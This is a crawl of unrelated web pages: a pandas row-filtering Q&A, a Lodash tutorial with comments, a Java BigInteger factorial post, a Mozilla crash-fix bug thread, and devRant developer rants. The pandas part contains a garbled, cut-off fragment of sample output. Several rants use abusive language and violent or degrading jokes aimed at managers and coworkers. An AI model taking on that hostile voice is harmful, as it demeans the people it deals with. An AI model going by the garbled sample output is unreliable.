np.random.seed([3,1415]) d1 = pd.DataFrame(np.random.randint(10, size=(10, 5)), columns=list('ABCDE')) def mask_with_values(df): mask = df['A'].values == 'foo' return df[mask] def mask_with_in1d(df): mask = np.in1d(df['A'].values, ['foo']) return df[mask] def reconstruct(df): v = df.values mask = np.in1d(df['A'].values, ['foo']) return pd.DataFrame(v[mask], df.index[mask], df.columns) spec = pd.DataFrame( index=['mask_with_values', 'mask_with_in1d', 'reconstruct'], columns=[10, 30, 100, 300, 1000, 3000, 10000, 30000], dtype=float ) Testing for j in spec.columns: d = pd.concat([df] * j, ignore_index=True) for i in spec.index: stmt = '{}(d)'.format(i) setp = 'from __main__ import d, {}'.format(i) spec.at[i, j] = timeit(stmt, setp, number=50) Answer #3: The Pandas equivalent to select * from table where column_name = some_value is table[table.column_name == some_value] Multiple conditions: table[(table.column_name == some_value) | (table.column_name2 == some_value2)] or table.query('column_name == some_value | column_name2 == some_value2') Code example import pandas as pd # Create data set d = {'foo':[100, 111, 222], 'bar':[333, 444, 555]} df = pd.DataFrame(d) # Full dataframe: df # Shows: # bar foo # 0 333 100 # 1 444 111 # 2 555 222 # Output only the row(s) in df where foo is 222: df[df.foo == 222] # Shows: # bar foo # 2 555 222 In the above code it is the line df[df.foo == 222] that gives the rows based on the column value, 222 in this case. Multiple conditions are also possible: df[(df.foo == 222) | (df.bar == 444)] # bar foo # 1 444 111 # 2 555 222 But at that point I would recommend using the query function, since it’s less verbose and yields the same result: df.query('foo == 222 | bar == 444') Answer #4: I find the syntax of the previous answers to be redundant and difficult to remember. Pandas introduced the query() method in v0.13 and I much prefer it. For your question, you could do df.query('col == val') Reproduced.303746 8 0.116822 0.364564 0.454607 9 0.986142 0.751953 0.561512 # pure python In [170]: df[(df.a < df.b) & (df.b < df.c)] Out[170]: a b c 3 0.011763 0.022921 0.244186 8 0.116822 0.364564 0.454607 # query In [171]: df.query('(a < b) & (b < c)') Out[171]: a b c 3 0.011763 0.022921 0.244186 8 0.116822 0.364564 0.454607 You can also access variables in the environment by prepending an @. exclude = ('red', 'orange') df.query('color not in @exclude') Answer #5: More flexibility using .query with pandas >= 0.25.0: August 2019 updated answer Since pandas >= 0.25.0 we can use the query method to filter dataframes with pandas methods and even column names that have spaces. Normally the spaces in column names would give an error, but now we can solve that using a backtick (`) – see GitHub: # Example dataframe df = pd.DataFrame({'Sender email':['[email protected]', "[email protected]", "[email protected]"]}) Sender email 0 [email protected] 1 [email protected] 2 [email protected] Using .query with method str.endswith: df.query('`Sender email`.str.endswith("@shop.com")') Output Sender email 1 [email protected] 2 [email protected] Also we can use local variables by prefixing it with an @ in our query: domain = 'shop.com' df.query('`Sender email`.str.endswith(@domain)') Output Sender email 1 [email protected] 2 [email protected] Hope you learned something from this post. Follow Programming Articles for more!
https://programming-articles.com/how-to-select-rows-from-a-dataframe-based-on-column-values-pandas-answered/
CC-MAIN-2022-40
en
refinedweb
Lodash is a Javascript utility library, that helps you work with arrays, objects, strings, and just write fewer functions in general. Let's talk Lodash and some of its most useful methods! 1.) _.get() The _.get() method can help us find an element in an object. If an element is not found at the specified path we can specify a default value for the _.get() method to return. const foodObj = { favFoods: [ "Pizza", "Chicken Nuggets", "Lasagna", { favCandy: "Sour Boys Candy" }, ], }; // We will use the _.get() method to find my favorite candy. const myFavCandy = _.get(foodObj, 'favFoods[3].favCandy', 'Chocolate') // mymyFavCandy => "Sour Boys Candy" console.log(myFavCandy) A few things to notice here are The _.get()method can receive three arguments, the first being the object we want to get an element from. The second is the path. The third is the default we want to return if an element was not found. The path to the element is a string. The default retuned value can be any data type (object, string, number, null, etc). By default, the _.get()method will return undefinedif an element was unable to be found. 2.) _.find() You might think that the _find() method is similar to the _.get() method, and yes, they will both return a value we are looking for but, there is a few key differences that are important to understand. Let's first take a look at the _.find() method. _.find method will iterates over an object or an array and retun the first element that returns true. const myNewBestFirend = _.find( adoptableDogs, // This function will be called on every iteration. (obj) => obj.breed === "White Lab" && obj.age > 2, 2 ); // myNewBestFirend => { name: 'Snowflake', age: 3, breed: 'White Lab' } console.log(myNewBestFirend); Kinda cool right? We should talk about those differences though. The _.find()method also takes three arguments, but unlike the _.get()method, the first argument can be an array or an object. The second argument is the function that will fire on every iteration. I used a function in the example above to help solidify this concept. This is important to understand and hopefully helps demonstrate the possibilities. The third argument is the starting index of the collection. Since the _.find()method iterates over every element in a collection. Performance is something to think about with large data sets/collections. You can specify a starting index for the _.find()method to start its search at. 3.) _.map() The _.map method will iterate over a collection(array, object), and return a new array based on the return value of the function called on each iteration. Let's take a peek. _.map method will iterate over the adoptableDogs array and return a new array with all of the dogs' names. const adoptableDogsNames = _.map(adoptableDogs, (dog) => dog.name); // adoptableDogsNames => [ 'Rex', 'Sundance', 'Milo', 'Snowflake', 'Chip', 'Bolt' ] console.log(adoptableDogsNames); As you can see the _.map() method returns a new array with just the dogs' names as the elements in the array. 4 _.set() The _.set() method is the opposite of the _.get() method. It will set the value of an element at a specified path. The first argument is the object or array, the second is the path, and the third is the value you desire to set." }, ]; // Sets the age of the dog at the second index of the adoptableDogs array to 1. _.set(adoptableDogs, "[2].age", 1); // adoptableDogs[2] => { name: 'Milo', age: 1, breed: 'Husky' } console.dir(adoptableDogs[2]); 5.) _.debounce() This is one of the most powerful lodash methods in my opinion. It can also be very hard to understand what it does and when you might want to use it. The _.debounce() method will return a function. The function returned by the _.debounce() method will delay its invocation until a specified number of milliseconds has elapsed since the last time the function was invoked. Let's say you were listening to a DOM event (scroll, resize, etc) or API/Webhook route, the event or API may be called multiple times a day or even second. Now let's say you only want to run the function once every 24 hours even if the event or API is called multiple times a second, this is where a debounced function would help. Let's take a peek at the code! const updateData = _.debounce( () => { // Code here! We might update some kind of data that might need to be updated once a day. console.log("Went and grabbed some new data"); }, 1000 * 60 * 60 * 24, // 1 Day Timeout { // defines if the invocation of the function is on the trailing or leading edge of the timeout. leading: true, trailing: false, } ); // We can call the function returned by the _.debounce method. updateData(); Conclusion Lodash is a very helpful utility library, and it has a bunch of helpful methods! We have just barely scraped the surface of lodash in this post. If you would like to know more about the _.debounce method and take a deeper dive into it, check out this blog post by David Corbacho - Debouncing and Throttling Explained Through Examples You can also follow me on GitHub, Youtube, and Twitter. Top comments (27) I'm confused - most, if not all of the examples above can be achieved using less code in plain JS - without the overhead of a library. Using plain JS will also be faster. The debounce one is quite useful, but again - easy to write yourself instead of including a whole library 1. 2. 3. 4. No 72.5Kb of lodasheven remotely required In general for this simple cases yes you don't need lodash, but in more real complex applications is simplify many things especially the chaining. For example in 1 and 4 when you don't know in compile time the "path", but is something that is user/api/external input how you are going to do it ? One other thing that I like in lodash is the internal error checking and handling. For example the 2 and 3 example if the adoptableDogs is null/undefined the code is going to get exception, you need to check it before use it. The lodash is going to return empty array in map and null in find, a consistent result that you don't need to have special check or path in your code flow. I agree. I was merely pointing out that these were poor examples, that do not really give any idea of why, and in what situations Lodash can be beneficial Some points: setsafely gives you a new object (not deep clone, but property copy) Promise, your own composition, or the new pipeline operator, you end up wrapping all this stuff. So, the writer's example for number 4 then does not even work? The way the example is written implies mutation. This adds even more weight to my contention that these are poor Lodash examples No it works, he imported map form lodash, not lodash/fp. Most people when starting to learn will start with Lodash, and that works great for many years. Those who want curry first, data last style coding can use lodash/fp when they are ready (if they want, no pressure). All the same imports, but the parameter order is usually reversed. Ah ok, your comments were referencing a functional version of Lodash Sort of, it's kind of confusing and frustrating. Like, Lodash makes it pretty clear some methods mutate the original Array/Object, while others return shallow copies. You'd assume the FP version would, but that's not always the case, so... it's kind of FP, which is better than nothing; at least they document it. For things like set, though, thankfully, they work the same in both lodash and lodash/fp; it returns a "new"ish Object without mutation. So the writer's example doesn't work Why you gotta be a troll, man? Guy is just trying to show how cool Lodash is. Not trolling. His examples don't show how good Lodash is, and - as we've established - the fourth example doesn't work if what you said about setnot mutating is correct All those "modern JS" native methods did not exist when Lodash was first conceptualized.... You are not wrong! Lodash has a bunch of methods that just make doing certain tasks easier. Adding Lodash to your Javascript project adds these methods some other frameworks like Django or Ruby on Rails would have out of the box. Such as the zip method in Ruby on Rails which will zip together two arrays into one. Javascript doesn't have this functionality out of the box... Lodash has a _.zip method. Don't get me wrong you could also do this with the array .map method in Javascript. As for the library overhead you could always import each method individually. Ex. const zip = require("lodash/zip"); You certainly should only import the modules you use, otherwise a few convenience methods are taking up more space than whole frameworks like React. Functions such as debounce()in lodash have tons of options that make them much heavier than lightweight implementations (which are mostly what it is used for) - if you aren't using the options for trailing and leading edges, it's costing "something". For me in big apps that are likely to use lots of utility methods over time, I'd take Sugar.js because that has some really useful functions - like Date.create("Next monday at 2pm"), debounce etc. It's also 1/3 the size of lodash if you include it all (and you don't have to). Probably would have been better to show examples of where using Lodash would actually have some benefit Maybe in my next post! 😉 say tuned lol! 'Tuned' I see what you did there 👀 I don't know anything about ruby on rails but isn't that concat? w3schools.com/jsref/jsref_concat_a... It's a little different concat would join the two arrays. So if you had [1, 3, 5] and [2, 4]. The results of concatenation would be [1, 3, 5, 2, 4]. The zip method would zip the two arrays together like a zipper. The results would look like this [1, 2, 3, 4, 5] So basically concat + sort? I think you have a point especially on the client - downloading dozens of extra KB's is not a good idea unless it's really necessary ... server side (node.js) this is less of an issue. Recommendation: Do not use Lodash in current year. Like others here have pointed out, It is a literal waste of kb's in your payload. :) well, import { debounce } from 'lodash';kinda takes your argument away (there are even separate packages for everything). also, in past years I'd been writing my own debounce function in every project, it isn't that a complex mechanism. I'm not that foolish any more. the lodash's version is superior and documented. and that's gist of it. debouncing is not Lodash tho, it’s part of the library by practical coincidence. It could also be a separate package like you point out. Lodash was made in an age when array methods where lacking and polyfiling was less common. If they changed the focus of the library, then I did not get the memo. :) in Lodash, I use debounce and cloneDeep most :)
https://dev.to/camskithedev/5-must-know-lodash-methods-4g6p
CC-MAIN-2022-40
en
refinedweb
Fact a really large integer value, something which is even bigger than the maximum value of long primitive like 2^63 -1 or 9223372036854775807L. You also need to change the way we calculate factorial for a smaller number. You can not use recursion to calculate the factorial of a larger number instead we need to use for loop for that. Also worth noting is that, similar to java.lang.String and other wrapper classes BigInteger is also Immutable in Java, which means it's important to store the result back into the same variable, otherwise, the result of the calculation will be lost. BigInteger stores numbers as 2's complement number like int primitive and support operation supported by int variables and all relevant methods from java.lang.Math class. Additionally, it also provides support for modular arithmetic, bit manipulation, primality testing, prime generation, GCD calculation, and other miscellaneous operations. Also, basic knowledge of essential Java concepts and API is also very important and that's why I suggest all Java programmers join a comprehensive Java online course like The Complete Java Masterclass on Udemy to improve their Java knowledge and API skills. Java Program to Calculate Factorial of Large NumberHere is our sample Java program to calculate factorial for large numbers, well, the given number is not exactly large but the factorial value is definitely large. For example, the factorial of 45 is 119622220865480194561963161495657715064383733760000000000, which is clearly out of bounds for even a long data type. Since theoretically, BigInteger has no limit it can hold these values as shown in the following example. You will also notice that instead of recursion, we have used iteration to calculate factorial in Java. import java.math.BigInteger; /** * Write a Java program to calculate factorial of large numbers using * BigInteger. * * @author WINDOWS 8 * */ public class LargeFactorialDemo { public static void main(String args[]) { System.out.printf("Factorial of 32 is %s %n", factorial(32)); System.out.printf("Factorial of 0 is %s %n", factorial(0)); System.out.printf("Factorial of 1 is %s %n", factorial(1)); System.out.printf("Factorial of 5 is %s %n", factorial(5)); System.out.printf("Factorial of 41 is %s %n", factorial(41)); System.out.printf("Factorial of 45 is %s %n", factorial(45)); } /* * Java method to calculate factorial of a large number * @return BigInteger factorial of given number */ public static BigInteger factorial(int number) { BigInteger factorial = BigInteger.ONE; for (int i = number; i > 0; i--) { factorial = factorial.multiply(BigInteger.valueOf(i)); } return factorial; } } Output Factorial of 32 is 263130836933693530167218012160000000 Factorial of 0 is 1 Factorial of 1 is 1 Factorial of 5 is 120 Factorial of 41 is 33452526613163807108170062053440751665152000000000 Factorial of 45 is 119622220865480194561963161495657715064383733760000000000 You can see that how large factorial of 45 is, clearly it's not possible to use a long data type to store such huge integral values. You need to use the BigInteger class to store such big values. BTW, If you are looking for some programming exercise to prepare coding interviews or to develop your programming logic then you should check problems from Cracking the Coding Interview: 189 Programming Questions and Solutions, one of the best books for preparing coding interviews. Important things about BigInteger class in JavaBigInteger class in Java is designed to deal with really large numbers in Java, but to do that it's very important that you make yourself familiar with the class. Here are some key points about java.math.BigInteger class : 1. The BigInteger class is used to represent arbitrarily large numbers. Overflow doesn't occur as is the case with int and long primitive. 2. The BigInteger class is immutable which means that the object on which the multiply function was invoked doesn't change the integer it is holding. The multiplication is performed and a new BigInteger is returned which needs to be stored in the variable fact. 3. BigInteger provides operations similar to int primitive type in Java, additionally, it provides support for the prime generation, bit manipulation, GCD calculations, etc. 4. You can create BigInteger object by giving number as String or byte array using constructor, or you can convert a long value to BigInteger using valueOf() method as shown below : BigInteger bigIntegerFromLong = BigInteger.valueOf(292909333L); BigInteger bigIntegerFromString = new BigInteger("338948938948"); Remember BigInteger can help you to deal with really large numbers in Java. That's all about how to calculate the factorial of a large number in Java. Clearly, after some point long is not enough to result of the factorial and you need something bigger than long but not double, BigInteger is the class to represent large integral values. In theory, BigInteger has no limit and it can represent any integral value till infinity. If you are looking for some handy Java programming exercise then don't forget to check out the following posts and some good books : - Top 15 Data Structure and Algorithm Interview Questions (see here) - 10 Free Data Structure and Algorithms courses (free courses) - How to print all permutations of a String in Java? (solution) - How to write FizzBuzz in Java 8? (answer) - Top 20 String coding interview questions (see here) - How to find the first non-repeated character from String? (solution) - 133 core Java interview questions of last 5 years (see here) - Top 30 Array Coding Interview Questions with Answers (see here) - How to reverse an array in place in Java? (answer) - Top 30 linked list coding interview questions (see here) - How to reverse Integer in Java? (solution) - Top 50 Java Programs from Coding Interviews (see here) - Top 5 books on Programming/Coding Interviews (list) - How to check if the given String is Palindrome in Java? (solution) - My Favorite Coding interview courses for Beginners (courses) - 100+ Data Structure and Algorithms Questions for Interviews (questions) - How to swap two integers without using a temporary variable in Java? (solution) Thanks for reading this article so far. If you like this article then please share it with your friends and colleagues. If you have any questions or doubt then please let us know and I'll try to find an answer for you. P. S. - If you are new to Java and looking for free online courses to learn Java from scratch then you can also check out this list of free Udemy courses to learn Java. It contains 5 free Java courses from Udemy and Coursera to teach you Java from scratch. 5 comments : There is a error in the code...In the for loop, the condition should be i>0 there's a typo in for-llop, it should be: i > 0 Hello @Ansdeep and @Annonymous, yes that was a typo, corrected now. Thanks for pointing it. what plugin are you using to format your code in your blog? as far as I know there is no built in mechanism in Google Blog to format code. @Neha, I use online syntax highlighters and then use the HTML directly in blogger.
https://javarevisited.blogspot.com/2015/08/how-to-calculate-large-factorials-using-BigInteger-Java-Example.html
CC-MAIN-2022-40
en
refinedweb
Closed Bug 728656 Opened 11 years ago Closed 11 years ago Crash @mozilla::gl::GLContext::Init Extensions Categories (Core :: Graphics, defect) Tracking () mozilla13 People (Reporter: glandium, Assigned: glandium) Details (Keywords: crash, Whiteboard: [qa!:esr10]) Crash Data Attachments (1 file, 1 obsolete file) I got a couple reports in Debian with the following stack trace: #0 __strlen_sse2 () at ../sysdeps/x86_64/multiarch/../strlen.S:31 #1 0x00007ffff73c5876 in *__GI___strdup (s=0x0) at strdup.c:42 #2 0x00007ffff5748e96 in mozilla::gl::GLContext::InitExtensions (this=0x7fffc90f7800) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContext.cpp:448 #3 0x00007ffff574a507 in mozilla::gl::GLContext::InitWithPrefix (this=0x7fffc90f7800, prefix=<value optimized out>, trygl=<value optimized out>) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContext.cpp:374 #4 0x00007ffff5757d72 in mozilla::gl::GLContextGLX::Init (format=<value optimized out>, display=0x7ffff6d96000, drawable=<value optimized out>, cfg=<value optimized out>, vinfo=<value optimized out>, shareContext=0x7fffcaab0800, deleteDrawable=<value optimized out>, pixmap=0x7fffcb5b6d80) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContextProviderGLX.cpp:730 The code looks like this (in that particular version): 443 void 444 GLContext::InitExtensions() 445 { 446 MakeCurrent(); 447 const GLubyte *extensions = fGetString(LOCAL_GL_EXTENSIONS); 448 char *exts = strdup((char *)extensions); The problem is that fGetString(LOCAL_GL_EXTENSIONS) returns NULL, and strdup crashes when given a NULL argument. Assignee: nobody → mh+mozilla status-firefox-esr10: --- → affected status-firefox10: --- → affected status-firefox11: --- → affected status-firefox12: --- → affected status-firefox13: --- → affected Comment on attachment 598640 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation Review of attachment 598640 [details] [diff] [review]: ----------------------------------------------------------------- r=me with this caveat: ::: dom/base/nsGlobalWindowCommands.cpp @@ +66,5 @@ > #include "nsIClipboardDragDropHookList.h" > > using namespace mozilla; > > +static const char sSelectAllString[] = "cmd_selectAll"; That unrelated hunk should be handled separately. Attachment #598640 - Flags: review?(bjacob) → review+ (In reply to Benoit Jacob [:bjacob] from comment #2) > > +static const char sSelectAllString[] = "cmd_selectAll"; > > That unrelated hunk should be handled separately. That wasn't meant to be there. Refreshed to only contain the relevant part Status: NEW → RESOLVED Closed: 11 years ago Resolution: --- → FIXED Target Milestone: --- → mozilla13 Comment on attachment 598777 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation [Approval Request Comment] User impact if declined: Firefox may crash when the system GL libraries provide no extensions Risk to taking this patch (and alternatives if risky): It's a simple NULL check. No risk. String changes made by this patch: None Attachment #598777 - Flags: approval-mozilla-beta? Attachment #598777 - Flags: approval-mozilla-aurora? Comment on attachment 598777 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation [Triage Comment] please land this today if possible (02/27/12) for tomorrow's go-to-build on beta5 and also land on mozilla-esr10 branch before Thursday March 1, 2012 in preparation for March 2 go-to-build on esr. See for details Attachment #598777 - Flags: approval-mozilla-esr10+ Attachment #598777 - Flags: approval-mozilla-beta? Attachment #598777 - Flags: approval-mozilla-beta+ Attachment #598777 - Flags: approval-mozilla-aurora? Attachment #598777 - Flags: approval-mozilla-aurora+ Mozilla/5.0 (Windows NT 6.1; rv:10.0.3) Gecko/20100101 Firefox/10.0.3 No new crash reports having the signature: [@ strlen | je_strdup | mozilla::gl::GLContext::InitExtensions()] appear in Socorro after the patch landed. Marking this as Verified on Firefox 10.0.3 ESR. Whiteboard: [qa!:esr10]
https://bugzilla.mozilla.org/show_bug.cgi?id=728656
CC-MAIN-2022-40
en
refinedweb
Join devRant Pipeless API From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple APILearn More Search - "bullshit" - - - I fucking hate toxic positivity. Every fucking corporation pushes the notion that "lifE iS aWeSomE, wE cArE abOuT pEoPle" and other such bullshit, and when you point it out, they call you a bad, toxic person. No, you don't care about your community, let alone the whole world. You're just trying to make people believe that spyware, wage slavery and being fired by a neural network is the norm. You're making money off of those who don't have a choice. If you account all people, not just American white rich 1%, it turns out that for the vast majority of people life is either an uphill battle or straight up nightmare. People are working in shifts and have no time or emotional resource to spend on themselves. Most of the people can't afford a house or a flat. Even those who can still suffer from mental illnesses, to the point where there are more mentally challenged people than mentally healthy ones. The word "neurotypical" meaning "mentally healthy" is wrong. You want nothing but to sell your stuff and earn more money off of Chinese and Indian factory workers who work 16-hour shifts. Maybe your life is great, but aggressively pushing this notion is a big, wet spit in the face of humanity. Fuck you. Fuck your space rockets. Fuck your twitter accounts. Fuck your institutionalized exploitation of the weak. Fuck your products. Fuck your "open source". Fuck your "GDPR compliance". Fuck your offshores, your hedge funds and your tax evasion. Fuck your bailouts. Fuck your ships spilling tons of crude oil, fuck your factories, fuck your slave labor, fuck your anti-suicide nets in Chinese dormitories. One day, because of you, our planet will become unlivable. You will hop into your fancy space rocket to go to that top-1% elite Mars colony. Nice job. But I will pray for a solar flare to hit you and turn you and your fucking rocket into radioactive ash.22 - Fuck corporate bullshit. I do the job, you pay me, the rest is pointless crap. You are not my family, I don’t base my whole self worth on working for you and mostly I really don’t care. I’m really not cut out for this shit.9 - i was asked to start a new project, and another dev was brought onto the team shortly after. as soon as he joined, straight away he started an entirely new project and worked on it through the whole weekend, then came back on monday and just sort of pasted his files into/over the code i had already started and was working on, with no regard for folder structure or naming conventions or anything. his work was even split between 2 almost identically named namespaces (both of which were completely different to the existing project namespace) and his shit broke everything i did in the first place. the cherry on top is that none of his work was even functional, it was purely dummy/mockup web pages that weren't linked to any sort of backend. when i asked him wtf he thought he was doing, he kept saying "i didnt touch your code" and refused to acknowledge that pasting a project over a different project can break stuff, then said it "wasn't his fault that i'm slow and not keeping up". and just kept saying vague bullshit about how i have to do it his way because he "has more experience" he had no idea what my previous experience was, he had never asked and i had never told him, he just decided that he had more experience than me. i dug through the shit and found out that he didn't just break my work, he had actually purposely deleted it when he realised it was getting in the way of his spaghetti. i showed him the commit and confronted him with it and all the cunt said was "well the good news is, you know the fix" and kept trying to dismiss me in the most disrespectful ways he could think of. i eventually snapped at him (long overdue at this point) and told him that any experienced developer would not commit code that didn't even fucking compile, especially when they're the one who broke it, and that he needs to grow up. of course he then complained that i was being unprofessional. our manager decided we should go with fuckfaces """code""" without even looking at the work either of us had done, purely because fuckface is older than me and that's how the world works. in the end i just told my manager that i refuse to work with the guy and he could either take him or me off the project (guess who he picked) or i quit. after a few months of the guy failing to deliver any of even the basic functionality that was asked for, the entire project got scrapped, and the dude just quit once everyone realised he was literally just larping as an experienced dev but couldn't accomplish simple tasks. i never received an apology from anybody involved.5 - - FUCK WEB3, FUCK CRYPTO, FUCK NFTS, FUCK ALL THIS PONZI ASS BIG BULLSHIT!!!!!!!!!!! FUCK YOU WHOEVER MADE THJS!!!! THE ONLY ONES WHO PROFIT ARE NOT THE ONES WHO BUY CRYPTO OR JPEGS BUT THE ONES ON TOP OF THIS PYRAMID WHO CREATED IT!!!!! MIGHT AS WELL CODE MY OWN PYRAMID COIN/JPEG AND SELL IT TO SUCKERS!!!!!!!! FCKK YOU!!!!!!!!!!!!11 - I don't argue with managers. I believe the music is the universal language of the world, so I just sing! twinkle twinkle little star *pulls out glock* your bullshit has gone too far.5 - Its so weird working in this company. No onboarding, no micromanaging, noone to track your progress or performance. U can basically do what u want and ask what u want and requests will be fulfilled. Initially was assigned to a random team and started fixing stuff. I hated the scope so after 2 months in requested to switch teams, request approved. 3 months in realized I lowballed myself during the interview and actually am doing better than half of the team, so I asked for a 43% bump, request approved. 4 months in I realized that I did atleast 100hrs overtime in a month during crunchtime, burned out. Asked for a paid week off to recover, request approved. 5 months in realized that we have many MR's piling up in the team and I could help with approving some of them, but they grant MR approval rights only when u work here for a year or are a decent dev from the get go. Requested for MR approval rights, request approved. Again it feels so weird working on a big product with 6-7 scrum teams. Its like there is no bullshit, just ask what you need you will get what you asked so you can continue working. On the other hand its kinda weird to keep asking everything, in other companies a good teamlead/manager shows more initiative takes care of stuff like this without even asking.8 - - sooo shit started hitting the fan after another useless discussion where PM tried to hardcore micromanage me and then bullshit his way out, i fucking tilted and started swearing. after this discussion, he invited to a meeting next week to talk about "miscommunication". no need bruh, i'll tell my boss on Monday i want to switch to another team.8 -.16 - - sprint retros with PM are a fucking farce, it cannot possibly get any more grotesque. they are held like this: - in the meeting, PM asks each team member directly what they found good and bad - only half of the team gives real negative feedback directed towards the PM or the process, because they are intimidated or just not that confrontative - when they state a bad point, he explains them that their opinion is just wrong or they just need to learn more about the scrum process, in any case he didn't do anything wrong and he is always right - when people stand up against this behavior, he bullshits his way out, e.g. using platitudes like "it's a learning process for the whole team", switching the topic, or solely repeating what he had just said, acting like everybody agreed on this topic, and then continue talking - he writes down everything invisible for the team - after the meeting he mostly remembers sending a mail to the team which "summarizes" the retro. it contains funny points like "good: living the agile approach" (something he must have obviously hallucinated during the meeting) - for each bad point from team members, he adds a long explanation why this is wrong and he is doing everything right and it's the team's fault - after that happens the second part of the retro, where colleagues from the team start arguing with him via mail that they don't feel understood or strongly disagree with his summary. of course he can parry all their criticism again, with his perfectly valid arguments, causing even longer debates - repeated criticism of colleagues about poor retro quality and that we might want to use a retro tool, are also parried by him using arguments such as "obviously you still have to learn a lot about the scrum process, the agile manifesto states 'individuals and interactions over processes and tools', so using a tool won't improve our sprint retros" and "having anonymous feedback violates the principles of scrum" - when people continue arguing with him, he writes them privately that they are not allowed to criticize or confront him. i must say, there is one thing that i really like about PM's retro approach: you get an excellent papertrail about our poor retro quality and how PM tries to enforce his idiocratic PM dictatorship on the team with his manipulative bullshit. independently from each other, me and my colleague decided to send this papertrail to our boss, and he is veeeery interested. so shit is hitting the fan, and the fan accelerates. stay tuned シ16 - Everyone that says you can't get viruses in Linux because only .exe compiled programs can contain malicious code or some bullshit like this is a fucking retarded Sorry I had to say it12 - - You know what really grinds my gears? When a manager writes up some bullshit "this doesn't work". Then you waste your time following up, and they say, "oh yeah, this so and so pop up came up with validation error X". YEAH? AND I'M SUPPOSED TO KNOW THAT WHEN YOU WRITE ABSOLUTELY NO STEPS TO REPRODUCE, JUST COMING TO ME WITH "HEY, X IS BROKEN" GOD JUST GET FUCKING 1% TECHNICALLY LITERATE THATS ALL I ASK FOR I'M SO SICK OF YOUR SHIT2 - Not a coworker, but this guy who I went to uni with and was a real life saver when I was really down. (we played minecraft together) ... So, he is a real genius. One of those guys who I legit couldn't keep up with. His brain works, he doesn't bullshit his way through, he's not pretentious, he is legit a down to earth rare genius. Yet, he doesn't use his talents enough, he likes to work or go home to play minecraft. And he doesn't politically care enough, so I am almost sure that he will end up getting stuck in the defence force. We're still friends. And I try my hardest to not be nosy and nag at him that he can do better. I mean, he is happy the way he is, and he is not ambitious. But the memory of him is a reminder that not everyone who gets somewhere is the best and brightest.41 - - - Manager: Can you stay late as fuck today? One of our bitchiest vendors is gonna update their piece of crap and I'm pretty damn sure shit is gonna hit the fan Dev (inner voice): no fucking way, I have kids to watch and chores to do! Dev (outer voice): can't we just check everything in the morning? Manager: No fucking way! If there is some fucking "challenge" when our "people" try to log onto their shit, I'm gonna look like a chump! Let's talk silvers, I will sign on that bloody commie bullshit for your hours tonight. Dev (outer voice): Fine. Until how late? Dev (inner voice): Wait, I was supposed to do it without getting overtime bonus?6 - I get really defiant when i repeatedly get micromanaged with bullshit instructions, such as asking me to have my just started c++ library poc which also involves a lot of learning and will earliest be usable in a few months, "ready for our customer devs" in 2 weeks from now. just no, you fucking retard. also, the lib alone wouldn't make any sense, since the code parts working with it don't yet exist at all. and then getting instructed to ask customers if they can provide you with c++ code that solves the task for them in their own software, which of course will somehow magically fit in my existing codebase. even if it existed (which it fortunately doesn't because they do everything in C#), i don't think i'm going to be faster trying to somehow solder in their code into my library, of which i'm still brainstorming about the general architecture. if you have so fucking unrealistic expectations, maybe stop sniffing glue all day and don't make this my fucking problem - I'm gonna fail my now-online uni course. I'm not understanding jackshit. Fuck this covid bullshit. Thank you for listening.17 - so i had the "miscommunication" meeting with PM today. he criticized me for "not following his orders", allegedly having worked on stuff during this sprint that did not help fulfill his sprint goal, and that i should have aligned my work with him. i didn't even realize this exact goal existed specifically for my user story (even though it was at least mentioned with one single word in story description, must have read over it). however, during the whole fucking sprint, he never mentioned a single time i should align with him. every daily i'm explaining what i'm going to do, every day he sees subtasks that i created for this story, and he never disagreed or mentioned this topic, so i assumed i'm on track. and now suddenly, when sprint is over, he blames me for the misalignment? he also criticized me for having said something rude to him during a team meeting, but he couldn't rephrase or specify what i had said, he couldn't give any details at all, and also i couldn't understand or remember what he meant. what shall i respond to that?🤷♀️ also, aligning my work with that of a colleague and brainstorming with him about how our API could look like for our stakeholders was "not on track / following his orders" for him, even though i had announced it in the daily and he hadn't disagreed. either this guy has alzheimer's or he has a down on me, dunno what to make out of all that. and then he mentions i appear "somewhat aggressive" to him. hmm weird, why should someone become aggressive when they have to deal with this bullshit all the time 🤦♀️12 - - I'm pretty sure that the technical tests for FAANG are just to prove that you'll bust your ass doing trivial bullshit for them / and that you're a sucker -- instead of actual meaningful skill checks. Is this guy a total sucker who will drink our Koolaid when it's time? Are they wearing Nike? Yes. This is going to be a good investment. I was down and out once and got a job a Micheal's Art and Crafts store. The application was clearly a mindfuck test. It asked, "If your boss was stealing - would you report them?" BTW - the answer is "No." You only report people below you. I answered in the way I knew the computer wanted me to - and I got the job. Same shit. Are you subordinate? You're hired.2 - - That slow realization that you're hitting burnout due to the toxicity of those in non-technical roles above you is wild. Also, Jira, Scrum, Sprints and all the extra bullshit can fuck right off as well.3 - - - dear female devs / haecksen, how many other female devs do you have in your team? if not so many, how do you feel about it? and do you get a lot of sexist bullshit or not so much? would be great to hear your experiences. the female quota among our devs is < 3% 😅 most of the time i don't think about it and just do my job and it's fine, but sometimes i think, it's a bit weird. also, there is this fear that people might not have trust in my skills. it can be good and bad to be "special"... anyway, having more female rolemodels / mentors / colleagues to have technical discussions with would be awesome.59 - Dear customer, disregarding the bullshit your agency has dumped into Figma, I hereby deliver a clean, minimalist, and usable website without carousel sliders, chatbots, call-to-action teasers for newsletter signup, and muted auto-play videos consuming your end users' bandwidth. One day you will understand and be grateful, too!3 - - Yeah well fuck right off then. I'm just going to build a bot to auto signup for every possible username combination left in the latin alphabet. Then after the media bullshit dies down they'll be changing this policy. 👺23 - - Doing e-learning for a job One of the examples provided: "You could be late for work (fail to meet your objective of being on time) because you're hit by a car whilst crossing the road" Are you fucking kidding me, I think being late to work would be the least of my worries. Fuck corporate bullshit.18 - - I am a person who never lies. And when I see/hear others lie, be it for the benefit of mine or not, it gets my blood boiling. I disrespect liers with passion. And I particularly hate magic fixes at work. You know the ones, when smth is not working for a few weeks, you involve 3 other teams responsible for their tiers, and then one day suddenly everything starts working. When you ask all the 3 tiers what has been done - everyone says "nothing". If you do this bullshit to me, just know that everytime I remember you, before remembering your name/face/role I very vividly visualize pissing on your toothbrush right before you wake up. Or did I do that for real..? Idk, it's too vivid to distinguish2 